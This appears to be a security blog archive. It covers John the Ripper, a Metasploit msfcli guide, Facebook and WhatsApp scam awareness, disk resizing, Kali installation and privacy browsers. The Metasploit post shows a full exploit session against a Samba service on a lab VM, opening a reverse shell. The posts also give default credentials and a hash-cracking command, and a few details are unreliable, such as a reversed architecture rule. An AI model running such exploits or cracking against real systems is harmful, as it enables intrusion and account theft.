How to use John the Ripper: Password cracker.

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.

Many people ask, “How can I crack any password?” If you are reading this post, you are in a good place. In this article we dive into John the Ripper (JtR): you will see how it works and why it is important to use it.

In the previous article we saw how to install and get started with Kali Linux. In this article we are going to see how to get started with John the Ripper and how to use it. First, let us see what John the Ripper is.

What is John the Ripper?

First, you have to know that John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. It is designed to be both feature-rich and fast. It combines several cracking modes in one program and is fully configurable for your particular needs.

John the Ripper is available for several different platforms, which enables you to use the same cracker everywhere. It also supports hundreds of hash and cipher types.

How can I get John the Ripper?

After learning what John the Ripper is, the natural next question is how to get it.

As I mentioned before, John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product, please consider John the Ripper Pro, which is distributed primarily in the form of “native” packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.

Now, you can download John the Ripper on Linux, macOS, Windows, and Android on its official page Openwall.com/john. You must verify the authenticity and integrity of your John the Ripper downloads to make sure you downloaded a good one. Once you visit the official page you will get more information about that.

John the Ripper is available on Kali Linux as part of their password cracking metapackages.

What is John the Ripper used for?

This is another question some of you will ask, so let us answer it.

John the Ripper is a primary password cracker used during pen-testing exercises that can help IT guys spot weak passwords and poor password policies. It supports several common encryption technologies for Unix and Windows-based systems, and it autodetects the encryption on the hashed data.

John the Ripper also includes its own wordlists of common passwords for 20+ languages. John the Ripper is included in the pen-testing versions of Kali Linux.

Attack types

John the Ripper uses the dictionary attack: it takes text string samples from a wordlist, hashes them, and compares the result to the input hash. It also offers brute-force attacks. In this type of attack John the Ripper goes through all the possible plaintexts, hashes each one, and then compares it to the input hash.

It also uses character frequency tables to try plaintexts containing more frequently used characters first.
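The dictionary-plus-rules attack described above has a direct defensive counterpart: reject any new password that reduces to a wordlist entry once common mangling is undone. The script below is an added example, not code from John the Ripper or from this article; the wordlist, the substitution table and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: password-policy check that mirrors a wordlist + mangling-rules
# attack from the defender's side. Not John the Ripper code.

# Constructed sample wordlist; a real check would load a full common-password list.
WORDLIST=$(mktemp)
trap 'rm -f "$WORDLIST"' EXIT
printf '%s\n' password letmein dragon summer monkey hello > "$WORDLIST"

# Characters commonly swapped in for letters, and the letters they stand for.
LEET_FROM='4@3105$7'
LEET_TO='aaeiosst'
# sed script: drop digits and symbols added before or after a base word.
STRIP='s/^[0-9!@#$%^&*._-]*//; s/[0-9!@#$%^&*._-]*$//'

# reduced_forms CANDIDATE
# Prints two reductions of the candidate, one per line:
#   1. strip affixes, then undo substitutions  (P@ssw0rd1! -> password)
#   2. undo substitutions, then strip affixes  (Hell0!     -> hello)
# Both orders are needed because a trailing "0" may be padding or the letter "o".
reduced_forms() {
    lower=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    printf '%s\n' "$lower" | sed -e "$STRIP" | tr "$LEET_FROM" "$LEET_TO"
    printf '%s\n' "$lower" | tr "$LEET_FROM" "$LEET_TO" | sed -e "$STRIP"
}

# audit_password CANDIDATE
# Returns 1 and names the base word when a reduction is in the wordlist,
# returns 0 otherwise.
audit_password() {
    # -x: whole-line match, -F: fixed strings, -f: patterns are the wordlist lines
    match=$(reduced_forms "$1" | grep -xF -f "$WORDLIST" | head -n 1)
    if [ -n "$match" ]; then
        printf 'REJECT: reduces to wordlist entry "%s"\n' "$match"
        return 1
    fi
    printf 'OK: no wordlist entry found\n'
    return 0
}

# Constructed candidates
audit_password 'P@ssw0rd1!' || true
audit_password 'Hell0!' || true
audit_password 'correct-horse-battery-staple' || true
```

A password that passes this check is only known to be absent from the list used; length and uniqueness still matter.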

Some basic commands

Now we are going to go over some basic commands that you need to start using John the Ripper. To get started you need a file that contains the hash values to crack.

John usage example. (Tested in Kali Linux.)

Using a wordlist (--wordlist=/usr/share/john/password.lst), apply mangling rules (--rules) and attempt to crack the password hashes in the given file (unshadowed.txt):

root@kali:~# john --wordlist=/usr/share/john/password.lst --rules unshadowed.txt

Unique Usage Example

Using verbose mode (-v), read a list of passwords (-inp=allwords.txt) and save only unique words to a file (uniques.txt):

root@kali:~#  unique -v -inp=allwords.txt uniques.txt

This is the end of this article; we hope you now have a clear understanding of John the Ripper. If you have a question or suggestion, don’t keep it to yourself, share it with us. Thank you.

Metasploit framework for hackers and pentesters guide

What is Metasploit?

The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.

Metasploit is one of the single most useful security auditing tools freely available to security professionals today. Reaching all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics, and Reverse Engineering.

Kali Linux is developed, funded, and maintained by Offensive Security, a leading information security training company.

What is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The VM will run on any recent VMware products and other virtualization technologies such as VirtualBox.

You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.

Metasploit Architecture

Metasploit is written in Ruby and has been in development for many years. One can more easily understand the Metasploit architecture by taking a look under its hood.

In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the metasploit-framework package and is installed in the /usr/share/metasploit-framework directory, the top-level of which is shown below.

METASPLOIT OBJECT MODEL

In the Metasploit Framework, all modules are Ruby classes.

  • Modules inherit from the type-specific class
  • The type-specific class inherits from the Msf::Module class
  • There is a shared common API between modules

Payloads are slightly different.

  • Payloads are created at runtime from various components
  • Glue together stagers with stages

METASPLOIT INTERFACES

There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.

It is still beneficial, however, to be comfortable with all Metasploit interfaces.

What is the MSFcli?

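The msfcli provides a powerful command-line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create. Note that msfcli was removed from the Metasploit Framework in 2015, so the sessions below, captured on v4.5.0-dev, apply to older releases only.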

Command Line Interface Commands

For msfcli help, type msfcli -h.

Note: when using msfcli, variables are assigned using the “equal to” operator =, and all options are case-sensitive.

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
       =[ svn r15767 updated today (2012.08.22)
RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.

root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

To display available payloads for the current module, append the letter P to the msfcli command line string.

root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Benefits of the MSFcli Interface

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.

It also doesn’t support any of the advanced automation features of msfconsole.

Closing words

Congratulations, you have reached the end. We hope you now know what Metasploit is. If you have a question, don’t keep it to yourself; share it with us. For more information, go to the Offensive Security official page.

How to protect your Facebook account from hackers. Best techniques

Did you know that most Facebook accounts are hacked by bad guys?

Facebook is a popular free social networking website that allows registered users to create profiles, upload photos, and videos, send messages and keep in touch with friends, family, and colleagues. The site, which is available in 37 different languages, includes public features such as:

  • Marketplace: allows members to post, read and respond to classified ads.
  • Groups: allows members who have common interests to find each other and interact.
  • Events: allows members to publicize an event, invite guests and track who plans to attend.
  • Pages: allows members to create and promote a public page built around a specific topic.
  • Presence technology: allows members to see which contacts are online and chat.

Most Facebook accounts are hacked by bad guys who are looking for some information or just playing with hacking techniques, without even any profit from it. Others hack Facebook accounts to take over your Facebook page, if it has many likes and followers, for their future profit. So if you don’t want to be a future victim of Facebook account hackers, read this till the end.

Although Facebook has become more secure, there are some techniques hackers use to hack Facebook accounts, like phishing, keylogging, Trojans/backdoors, sniffing, social engineering, and session hijacking.

Facebook Security Features and Tips

Facebook provides security features like login alerts and approvals, and you can review and update your Security Settings at any time.

Keep Your Account Secure

If you want to keep your account secure, here are a few things you can do:

Protect your password

  • Don’t use your Facebook password anywhere else online, and never share it with other people. Make it secret.
  • Your password should be hard to guess, so don’t include your name or common words.
  • Try to mix uppercase, lowercase letters, and symbols to prevent brute force.

Also, use a password that is easy for you to remember but strong, as mentioned above.

Never share your login information

  • Scammers may create fake websites that look like Facebook and ask you to log in with your email and password. Don’t log in through untrusted links that are shared with you.
  • Always check the website’s URL before you enter your login information. When in doubt, type www.facebook.com into your browser to get to Facebook.
  • Don’t forward emails from Facebook to other people, since they may have sensitive information about your account.
  • Learn more about avoiding phishing.
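The URL check recommended above comes down to reading the host name, not the first familiar word in the address. The script below is an added example, not code from Facebook or from this article; the function names are hypothetical and the sample URLs are constructed, using the reserved .example domain for the lookalikes.

```shell
#!/bin/sh
# Added example: decide whether a link really points at facebook.com before
# any credentials are typed. Sample URLs are constructed for illustration.

# host_of URL
# Prints the lower-cased host of an https URL; fails for any other scheme.
host_of() {
    case $1 in
        https://*) rest=${1#https://} ;;
        *) return 1 ;;
    esac
    authority=${rest%%/*}              # cut the path
    authority=${authority%%\?*}        # cut the query string
    authority=${authority%%\#*}        # cut the fragment
    hostport=${authority##*@}          # drop "user@", a common disguise
    printf '%s\n' "${hostport%%:*}" | tr '[:upper:]' '[:lower:]'
}

# is_facebook_url URL
# True only when the host is facebook.com itself or one of its subdomains.
is_facebook_url() {
    host=$(host_of "$1") || return 1
    case $host in
        facebook.com|*.facebook.com) return 0 ;;
        *) return 1 ;;
    esac
}

# verdict URL: prints "genuine" or "lookalike" for the given link
verdict() {
    if is_facebook_url "$1"; then
        printf 'genuine\n'
    else
        printf 'lookalike\n'
    fi
}

# Constructed samples: the real site, then four ways a link can mislead.
for url in \
    'https://www.facebook.com/login' \
    'https://facebook.com.account-check.example/login' \
    'https://facebook.com@login.example/' \
    'https://faceb00k.example/' \
    'http://www.facebook.com/login'
do
    printf '%-52s %s\n' "$url" "$(verdict "$url")"
done
```

Only the first sample is reported as genuine: in the others the registered domain is not facebook.com, or the connection is not HTTPS.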

Log out of Facebook when you are sharing the same computer with someone.

It is also recommended to always log out of your account when you are not on your own phone or PC. Sometimes you may be using a friend’s phone; don’t forget to check that you have really logged out and deleted all your information from that phone or PC.

Don’t accept friend requests from people you don’t know

  • Scammers may create fake accounts to friend people.
  • Becoming friends with scammers might allow them to spam your timeline, tag you in posts and send you malicious messages.

Keep your browser up to date

Also, you must keep your web browser up to date and remove suspicious applications or browser add-ons.

Never click suspicious links

  • This includes links on Facebook (example: on posts) or in emails.
  • Keep in mind that Facebook will never ask you for your password in an email.
  • If you see a suspicious link on Facebook, you can report it

Use Facebook extra security options

  • You can also get alerts about unrecognized logins, and set up two-factor authentication.
  • If you’re logged in to Facebook on a computer, you can use Security Checkup to review your security settings.

Note: This feature is currently available to people logged into Facebook on a computer or the latest version of Facebook for Android or Facebook for iOS app.

Note also that Facebook uses HTTPS. Secure browsing (HTTPS) is a security feature that automatically encrypts your connection to Facebook. This helps protect your account by making it harder for anyone to access your Facebook information without your permission.

In addition, a secure connection is required to connect to Facebook and can’t be turned off.

Closing word

Congratulations, you have reached the end of this post. We hope you have enjoyed it and are now able to protect yourself against scammers. If you have any question or suggestion, let us know.

How to shrink disc in Kali Linux. professional way

Shrink a disc using Gparted

You may need to shrink your disc for different purposes, either to set up dual boot or for something else. Kali Linux gives you the opportunity to shrink your disc with GParted even if you are not a Linux expert.

Whether you have Kali Linux installed on your computer or you boot into a live Kali Linux session with your chosen installation medium, you can resize the partition to the desired size. In a live session the disk will not be in use, because Kali Linux will all be in memory.

Those who do not have Kali Linux installed on their PC can follow the first procedure.

To start resizing, make sure you insert your Kali Linux installation medium and power on the device. If needed, press the keyboard shortcut for the “boot order menu” (it depends on the manufacturer, e.g. F12 or F9) or boot into BIOS/UEFI and change the boot order to point to the installation medium first.

When the boot menu/options appear, you should see at least one new option. Depending on the manufacturer, hardware, how the system is configured, and install medium, you may see more options (e.g. Can you boot into non-UEFI?).

You may need to try a few different options in order to find success.

You should be greeted with the Kali Linux boot screen. Select Live, and you should be booted into the Kali Linux default desktop.

Nb: Kali changed to a non-root user policy by default since the release of 2020.1.

This means: During the installation of amd64 and i386 images, it will prompt you for a standard user account to be created.

Any default operating system credentials used during Live Boot, or pre-created image (like Virtual Machines & ARM) will be:

Username : kali

Password: kali

GParted is the GNOME Partition Editor for creating, reorganizing, and deleting disk partitions. GParted enables you to change the partition organization while preserving the partition contents.

Now launch GParted in Kali, which we’ll use to shrink the disc.

Once GParted has opened, select your Kali Linux partition (/dev/sda1) or another disc and resize it, leaving enough space.

Nb: If you are moving past into any non-white area of the partition, then you are editing a section that is in use. Only remove from the area of the partition that is not in use.

Nb: If you wish to organize the partition to group all the Linux partitions together, placing the free space at the end, you may do so.

Set the amount of space that you want to resize, then press Resize.

Once you have resized your partition, ensure you “Apply All Operations” on the hard disk. Exit GParted and reboot.

Closing word

Congratulations, you have reached the end of our guide. Now you are able to shrink your disc. In case of any questions, don’t hesitate to post your comment below. Thanks.

How to install Kali Linux properly in 2021. The best way

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Also, it contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

It was released on the 13th March 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.

Offensive Security is the team behind Kali Linux, a Debian-based system. Kali is the preferred weapon of choice on Null Byte, and you can install it as your primary system (not recommended), use it with dual boot, install it in a virtual workstation, or create a portable live version on a USB flash drive.

Here, we’ll be walking you through a very basic installation today, just enough to get you up and running to follow along with Null Byte guides. There are actually many things that can be done to customize the installation, but we just want the quick-and-dirty process.

  • More than 600 penetration testing tools included
  • Free (as in beer) and always will be: Kali Linux, like BackTrack, is completely free of charge and always will be. You will never, ever have to pay for Kali Linux.
  • Open source Git tree: they are committed to the open source development model and their development tree is available for all to see. All of the source code which goes into Kali Linux is available for anyone who wants to tweak or rebuild packages to suit their specific needs.

Is Kali Linux Right For You?

As the distribution’s developers, you might expect us to recommend that everyone should be using Kali Linux. The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you’re unfamiliar with Linux.

Even for experienced Linux users, it can pose some challenges. Although Kali is an open source project, it’s not a wide-open source project, for reasons of security. The development team is small and trusted, packages in the repositories are signed both by the individual committer and the team, and importantly the set of upstream repositories from which updates and new packages are drawn is very small. Note that adding repositories to your software sources which have not been tested by the Kali Linux development team is a good way to cause problems on your system.

If you are looking for a Linux distribution to learn the basics of Linux and need a good starting point, Kali is not the ideal distribution for you. You may want to begin with Ubuntu, Mint, or Debian instead. If you’re interested in getting hands-on with the internals of Linux, take a look at the Linux From Scratch project.

What’s New in Kali Linux?

In Kali Linux version 2019.4, released at the end of 2019, Offensive Security made significant changes to how it looks and feels. And its 2020.1 update, released in January 2020, built upon the new foundation.

Perhaps the most significant update is the default desktop environment, which is now Xfce, a change that was made mostly for issues related to performance. Also, for most users, GNOME is overkill, and a lightweight desktop environment like Xfce provides lower overhead, leading to snappier and quicker performance. For all the die-hard GNOME fans out there, the previous desktop environment is still supported and even comes with an updated GTK3 theme.

Other new features include the introduction of undercover mode, new public packaging and documentation processes, an update to Kali NetHunter, the addition of PowerShell, non-root users as the default, and other bug fixes and updates.

Which Image to Choose

The Kali Linux download page offers three different image types (Installer, NetInstaller and Live) for download, each available for both 32-bit and 64-bit architectures.

If in doubt, use the “Installer” image. You will need to check your system architecture to know whether to get 32-bit or 64-bit. If you don’t know it, you’re best to research how to find out. (As a rule of thumb, if it’s older than 2005 you should be okay with amd64/x64/64-bit.)

Installer

This is the recommended image to install Kali Linux. It contains a local copy of the (meta)packages listed (top10, default & large) so it can be used for complete offline installations without the need of a network connection.

It cannot be used to boot a live system (such as directly running Kali from a USB). It is only an installer image.

NetInstaller

It can be used if you want the latest packages every time you install Kali Linux or if the standard installer image is too big to download. This image is very small because it does not contain a local copy of the (meta)packages to install. They will all be downloaded during installation, so this requires a network connection, which will slow down the installation. Only use this image if you have reasons not to use the standard installer image above.

This image cannot be used to boot a live system (such as directly running Kali from a USB). It is only an installer image.

Live

This image is for running Kali Linux without installing it first so it is perfect for running off a USB stick (or a CD/DVD).

You are able to install Kali Linux in its default configuration from this image, but you will not be able to choose between desktop environments or to specify additional (meta)packages to install.

If you want to run an older version of Kali, you can visit its index of older image versions. While Kali 2020.1 replaced root users with non-root users as the default, you may want to install the last 2019 version instead, which will still give you most of the newest features offered.

Once you’ve decided how you want to run Kali, click the image name to download it, or hit the “Torrent” link instead if that will get the job done better.

If you’re not sure of the architecture of the system you want to run Kali on, on Linux or macOS you can run the command uname -m at the command line. If you get the response “x86_64”, use the 64-bit ISO image (the one containing “amd64” in the file name); if you get “i386”, use the 32-bit image (the one containing “i386” in the file name). If you’re on a Windows system, the procedure for determining your architecture is detailed on Microsoft’s website.

IMPORTANT! Never download Kali Linux images from anywhere other than the official sources. Always be sure to verify the SHA256 checksums of the file you’ve downloaded against the official values. It would be easy for a malicious entity to modify a Kali installation to contain exploits or malware and host it unofficially.
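One way to script the checksum comparison described above, as an added example that is not taken from the Kali documentation or from this article. It assumes the official values come as a checksum list in the usual "hash, two spaces, file name" layout; the function names, the file names and the stand-in image are constructed so the script runs offline.

```shell
#!/bin/sh
# Added example: compare a downloaded image against a checksum list.
# The image and the list below are constructed stand-ins, not real Kali files.

# sha256_of FILE: prints the hex digest (sha256sum on Linux, shasum on macOS)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi | awk '{ print $1 }'
}

# verify_image FILE SUMS_FILE
# Returns 0 when the digest matches the entry for FILE's base name,
#         1 when an entry exists but the digest differs (do not use the file),
#         2 when the file, the list or the entry is missing (nothing proven).
# Assumes file names without spaces, as in a typical checksum list.
verify_image() {
    [ -f "$1" ] && [ -f "$2" ] || return 2
    name=$(basename "$1")
    expected=$(awk -v n="$name" '
        { f = $2; sub(/^\*/, "", f) }      # binary-mode entries are "*name"
        f == n && length($1) == 64 { print tolower($1); exit }
    ' "$2")
    [ -n "$expected" ] || return 2
    [ "$(sha256_of "$1")" = "$expected" ]
}

# demo: builds a stand-in image and list, then exercises all three outcomes.
# Prints the three return codes on one line.
demo() {
    dir=$(mktemp -d)
    iso="$dir/kali-sample-amd64.iso"       # constructed stand-in image
    printf 'constructed image contents\n' > "$iso"
    printf '%s  %s\n' "$(sha256_of "$iso")" "$(basename "$iso")" > "$dir/SHA256SUMS"

    r1=0; verify_image "$iso" "$dir/SHA256SUMS" || r1=$?      # untouched file
    printf 'extra bytes\n' >> "$iso"                          # simulate tampering
    r2=0; verify_image "$iso" "$dir/SHA256SUMS" || r2=$?
    cp "$iso" "$dir/unlisted.iso"                             # no entry in the list
    r3=0; verify_image "$dir/unlisted.iso" "$dir/SHA256SUMS" || r3=$?

    rm -rf "$dir"
    printf '%s %s %s\n' "$r1" "$r2" "$r3"
}

demo
```

A matching digest only proves the file agrees with the list, so the list itself must come from the official source.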

Installing Kali Linux

The process for installing Kali Linux will be different depending on what version you chose. For help on installing Live images, see Kali’s own documentation.

Installing Kali Linux (Single boot) on your computer is an easy process. This guide will cover the basic install (which can be done on bare metal or guest VM), with the option of encrypting the partition. You should be able to use Kali Linux on newer hardware with UEFI and older systems with BIOS.

System Requirements

The installation requirements for Kali Linux will vary depending on what you would like to install and your setup. For system requirements:

  • On the low end, you can set up Kali Linux as a basic Secure Shell (SSH) server with no desktop, using as little as 128 MB of RAM (512 MB recommended) and 2 GB of disk space.
  • On the higher end, if you opt to install the default Xfce4 desktop and the kali-linux-default metapackage, you should really aim for at least 2048 MB of RAM and 20 GB of disk space.

Installation Prerequisites

This guide also makes the following assumptions when installing Kali Linux:

  • Using the amd64 installer image.
  • CD/DVD drive / USB boot support.
  • Single disk to install to.
  • Connected to a network (with DHCP & DNS enabled) which has outbound Internet access.

Nb: We will be wiping any existing data on the hard disk, so please backup any important information on the device to an external media.


Preparing for the Installation

  1. Download Kali Linux (Installer is recommended).
  2. Burn the Kali Linux ISO to DVD or image Kali Linux Live to a USB drive.
  3. Backup any important information on the device to an external media.
  4. Ensure that your computer is set to boot from CD/DVD/USB in your BIOS/UEFI.

Installation Procedure

1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Linux Boot screen. Choose either Graphical install or Install (Text-Mode). In this example, we chose the Graphical install.

boot kali. source from kali.org

2. Then select your preferred language. This will be used for both the setup process and once you are using Kali Linux.

3. Next, specify your geographic location.

4. Then select your keyboard layout.

5. The setup will now probe your network interfaces, look for a DHCP service, and then prompt you to enter a hostname for your system. In the example below, we’ve entered kali as our hostname.

If there is no network access with DHCP service detected, you may need to manually configure the network information or choose not to configure the network at this time.

  • If there isn’t a DHCP service running on the network, it will ask you to manually enter the network information after probing for network interfaces, or you can skip.
  • If Kali Linux doesn’t detect your NIC, you either need to include the drivers for it when prompted, or generate a custom Kali Linux ISO with them pre-included.
  • If the setup detects multiple NICs, it may prompt you which one to use for the install.
  • If the chosen NIC is 802.11 based, you will be asked for your wireless network information before being prompted for a hostname.

6. You may optionally provide a default domain name for this system to use (values may be pulled in from DHCP or from a pre-existing operating system).

7. Next, create the user account for the system (Full name, username and a strong password).

7. a. You can create a username of your choice

7. b. You must also create a strong password to protect your Kali system.

8. Then set your time zone.

9. The installer will now probe your disks and offer you various choices, depending on the setup. In this guide, we are using a clean disk, so we have four options to pick from. We will select Guided – the entire disk: this is the single boot installation for Kali Linux, we do not want any other operating systems installed, and so we are happy to wipe the disk.

If there is any pre-existing data on the disk, you will have an extra option (Guided – use the largest continuous free space). This would instruct the setup not to alter any existing data, which is perfect for dual-booting into another operating system. As this is not the case in this example, it is not visible.

Experienced users can use the “Manual” partitioning method for more granular configuration options, which is covered more in our BTRFS guide.

10. Then select the disk to be partitioned.

11. Additionally, depending on your needs, you can choose to keep all your files in a single partition, “the default”, or to have separate partitions for one or more of the top-level directories. If you’re not sure which you want, you want “All files in one partition”.

11. a. Next we finalize partitioning.

12. You’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation.

13. Kali Linux uses a central repository to distribute applications. You’ll need to enter any appropriate proxy information as needed.

14. Here you can select which metapackages you would like to install. The default selections will install a standard Kali Linux system and you don’t really have to change anything here. Please refer to this guide if you prefer to change the default selections.

15. Next, confirm that you want to install the GRUB boot loader.

16. Here you select the hard drive to install the GRUB bootloader in (it does not by default select any drive).

17. Finally, click Continue to reboot into your new Kali Linux installation.

Closing word

Congratulations, you have reached the end of our guide. Now you are able to install Kali Linux properly. In case of any questions, don’t hesitate to post your comment below. For more details, go to kali.org. Thanks.

How hackers hack WhatsApp accounts: new technique in 2021

How do they hack WhatsApp?

WhatsApp is a free, multiplatform messaging app that lets you make video and voice calls, send text messages, and more, all with just a Wi-Fi or other connection.

The only information needed to fully access someone’s WhatsApp account is a valid phone number and a verification code.

Who would have thought that the way of logging into WhatsApp accounts could be misused to hack user data without their knowledge?

How do they hack WhatsApp?

The first thing hackers do is send you a message claiming that they made a mistake.

So if you receive a message on your phone explaining that an error has been made, and that you received a code meant for another person that would allow them to connect to WhatsApp, do not disclose this code!

NB: they can use different attractive messages to get you to send them the confirmation message.

Anyone who has access to this code, along with your phone number, could enter your account and lock you out so that you can no longer access it.


How does it work?

The only information needed to connect to someone’s WhatsApp account is a valid phone number and a verification code, which is sent to that number by SMS and is used to verify the identity of the person wishing to connect.

Unfortunately, some people have decided to take advantage of this ease of use against WhatsApp users.

All they need to know is the phone number of their potential victim. They register on the application with this phone number, which does not belong to them.

However, these same people cannot access the account without the access code, which was sent to the victim’s phone. So the victim receives the following message:


“Hey, I accidentally sent a WhatsApp verification code to your phone. Can you send it to me?”.

It can be any message that asks you to pass on a message you received.

If a victim responds to this message with the code they received by text message, the perpetrators are in possession of the victim’s telephone number, and also of the identity verification code.

In other words, they have it all. At that point, they become the owner of your WhatsApp account.

A tip, as WhatsApp specifies in its terms of use: never disclose this code to anyone.

“You should never share your WhatsApp verification code with others. If someone is trying to take over your account, they need the SMS verification code sent to your phone number to do so.

Without this code, any user attempting to verify your number can’t complete the verification process and use your phone number on WhatsApp. This means you remain in control of your WhatsApp account.”

WhatsApp doesn’t have sufficient information to identify the individual who is attempting to verify your WhatsApp account.

So be careful – the security and the use of your WhatsApp account depend on it!

Online privacy | 6 best anonymous browsers

Why should you start using anonymous browsers instead of regular ones?

Privacy is the ability of an individual or group to seclude themselves or information about themselves and thereby express themselves selectively.

When something is private to a person, it usually means that something is inherently special or sensitive to them. The domain of privacy partially overlaps with security, which can include the concepts of appropriate use, as well as protection of information.

Protecting online privacy with the 6 best anonymous browsers

You may ask yourself: why should I start using anonymous browsers instead of regular ones?

You may find that the answer is clear: these days, nothing on the internet is private. Many websites claim to provide online privacy, but it is a joke, and our private browsing data is used for business purposes such as advertising. We are being tracked by Google, by our governments and by many data collectors.

It’s easy for them to know what we are doing online and which websites we are visiting. They collect all this information and can use it against us, now or in the future. And the hard truth is that it’s more or less impossible to be fully anonymous.

But we can reduce the impact to some extent by following some quick measures that will shrink our leaked-information footprint and (almost) secure our online privacy. In this article, we cover one such measure to protect your browsing data.

The anonymous browsers that we are going to see are more powerful in terms of security and privacy than regular ones.

These secure browsers prevent somebody watching your internet connection from learning what sites you visit, stop the sites you visit from learning your physical location, and let you access sites which are blocked.

Anonymous browsers:

1. Tor Browser – privacy


Tor Browser, the most powerful anonymous browser, is completely free and open-source software built around onion routing. Tor protects you by sending your internet traffic and communications around a distributed network of relays run by volunteers all around the world.

Instead of directing traffic straight from A to B, Tor Browser bounces it multiple times through different locations. In this way, no one could possibly tell where the traffic originated or where it’s going.


Many government organizations also use Tor Browser to gather intelligence and to visit the darknet or other websites without leaving any digital footprints or government IP addresses in the site’s logs. This makes Tor one of the most secure web browsers and the best open-source alternative to Google Chrome.

In addition, Tor helps you visit websites that might be blocked in your country.


If you want to know more about Tor Browser, visit the official website.

2. Epic Browser – privacy


Epic Browser is a Chromium-based anonymous web browser that can stop 600+ tracking attempts in an average browsing session. It restricts websites from showing ads, fingerprinting, crypto-mining, ultrasound signalling and more.

Only when you’re using Epic with the encrypted proxy on is your data encrypted and hidden from the government, from your ISP, from Google and from hundreds of data collectors. When you close it after internet surfing, it automatically deletes the browsing history, cookies, web cache, databases, and web, Flash & Silverlight cookies: literally everything that compromises your privacy.


If you want to know more about Epic Browser, visit the official website.


3. Comodo Dragon / Ice Dragon


Comodo created two flavors of anonymous browser. The first, Comodo Dragon, is a Chromium-based secure web browser like Epic. It comes with all of Chrome’s features plus an unparalleled level of security and privacy.

The other, Comodo IceDragon, is a fast and versatile internet browser based on Mozilla Firefox which features several security, performance and feature enhancements over the core build. Fully compatible with Firefox plug-ins and extensions, IceDragon combines the freedom and functionality of Firefox with the unparalleled security and privacy of Comodo.

The Comodo Dragon and IceDragon privacy web browsers have top-level security features to anonymize your browsing data from third parties.


If you want to know more about Comodo Dragon / Ice Dragon, visit the official website.

4. Brave Browser – privacy


Brave Browser protects you against ads and trackers. It blocks any cookies other than those absolutely needed. It also isolates each tab so that websites can’t communicate.

You also get protection against malicious code and malicious sites, especially those related to cryptocurrency mining. And if you need an extra layer of privacy, Brave allows you to take part in a Tor network (instead of offering the traditional “Incognito” mode).

BRAVE SHIELDS FOR PRIVACY

Block data-grabbing ads and trackers

The vast bulk of websites and ads include software that tries to identify you. They want to track your every move across the web. Brave blocks all this, allowing you to browse freely.


If you want to know more about Brave, visit the official website.

5. Waterfox


Waterfox was started back in March 2011 by myself (Alex Kontos), a 16-year-old student. It is based on Mozilla’s free and open-source platform.

Waterfox was one of the first widely distributed 64-bit browsers on the web and quickly gained a loyal following. At the time it had one thing in mind: speed, but now it also attempts to be an ethical, user-oriented browser.

It focuses on giving users choice. The browser is focused on power users, which lets you make the important decisions.

